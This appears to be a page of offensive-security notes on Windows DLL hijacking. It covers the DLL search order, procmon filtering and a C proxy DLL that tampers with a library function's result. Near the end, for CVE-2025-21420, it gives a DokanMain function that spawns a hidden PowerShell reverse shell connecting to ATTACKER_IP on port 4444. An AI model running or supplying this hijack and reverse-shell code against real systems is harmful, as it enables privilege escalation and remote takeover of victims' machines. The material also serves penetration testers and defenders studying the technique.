DLL Hijacking
Hijacking opportunity if an application doesn't specify the full path to a required DLL
The default DLL search order used by the system depends on whether Safe DLL Search Mode is activated. Default setting: Enable
With this mode enabled, applications search for necessary DLL files in the following sequence:
- The directory from which the application is loaded. 
- The system directory. 
- The 16-bit system directory. 
- The Windows directory. 
- The current directory. 
- The directories that are listed in the PATH environment variable. 
However, if 'Safe DLL Search Mode' is deactivated, the search order changes to:
- The directory from which the application is loaded. 
- The current directory. 
- The system directory. 
- The 16-bit system directory. 
- The Windows directory 
- The directories that are listed in the PATH environment variable 
Use procmon to solely include main.exe

 Filter for an Operation of Load Image to only get the libraries the app is loading.

Proxying
 Create a new library that will load the function Add from library.dll, tamper with it, and then return it to main.exe.
- Create a new library: We will create a new library serving as the proxy for - library.dll. This library will contain the necessary code to load the- Addfunction from- library.dlland perform the required tampering.
- Load the - Addfunction: Within the new library, we will load the- Addfunction from the original- library.dll. This will allow us to access the original function.
- Tamper with the function: Once the - Addfunction is loaded, we can then apply the desired tampering or modifications to its result. In this case, we are simply going to modify the result of the addition, to add- + 1to the result.
- Return the modified function: After completing the tampering process, we will return the modified - Addfunction from the new library back to- main.exe. This will ensure that when- main.execalls the- Addfunction, it will execute the modified version with the intended changes.
// tamper.c
#include <stdio.h>
#include <Windows.h>
#ifdef _WIN32
#define DLL_EXPORT __declspec(dllexport)
#else
#define DLL_EXPORT
#endif
typedef int (*AddFunc)(int, int);
DLL_EXPORT int Add(int a, int b)
{
    // Load the original library containing the Add function
    HMODULE originalLibrary = LoadLibraryA("library.o.dll");
    if (originalLibrary != NULL)
    {
        // Get the address of the original Add function from the library
        AddFunc originalAdd = (AddFunc)GetProcAddress(originalLibrary, "Add");
        if (originalAdd != NULL)
        {
            printf("============ HIJACKED ============\n");
            // Call the original Add function with the provided arguments
            int result = originalAdd(a, b);
            // Tamper with the result by adding +1
            printf("= Adding 1 to the sum to be evil\n");
            result += 1;
            printf("============ RETURN ============\n");
            // Return the tampered result
            return result;
        }
    }
    // Return -1 if the original library or function cannot be loaded
    return -1;
}Rename library.dll to library.o.dll, and rename tamper.dll to library.dll.
Running main.exe

Invalid Libraries
Result filter set to NAME NOT FOUND to observe binaries searching for their lost DLLs.
See References
PowerSploit
See References
Tools
DLL Sideloading
CVE-2025-21420
Windows Disk Cleanup Tool Elevation of Privilege Vulnerability
Reverse shell - Change DokanMain for example:
void DokanMain() {
    wchar_t reverseShellCmd[] = L"powershell.exe -NoExit -Command \"$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP', 4444); $stream = $client.GetStream(); [byte[]]$buffer = 0..65535|%{0}; while(($i = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) { $data = (New-Object Text.ASCIIEncoding).GetString($buffer, 0, $i); $sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte, 0, $sendbyte.Length); $stream.Flush(); }; $client.Close();\"";
    STARTUPINFOW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    si.cb = sizeof(si);
    if (!CreateProcessW(NULL, reverseShellCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
        MessageBoxW(NULL, L"Failed to create process", L"Error", MB_OK);
        return;
    }
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return;
}Resources
Last updated



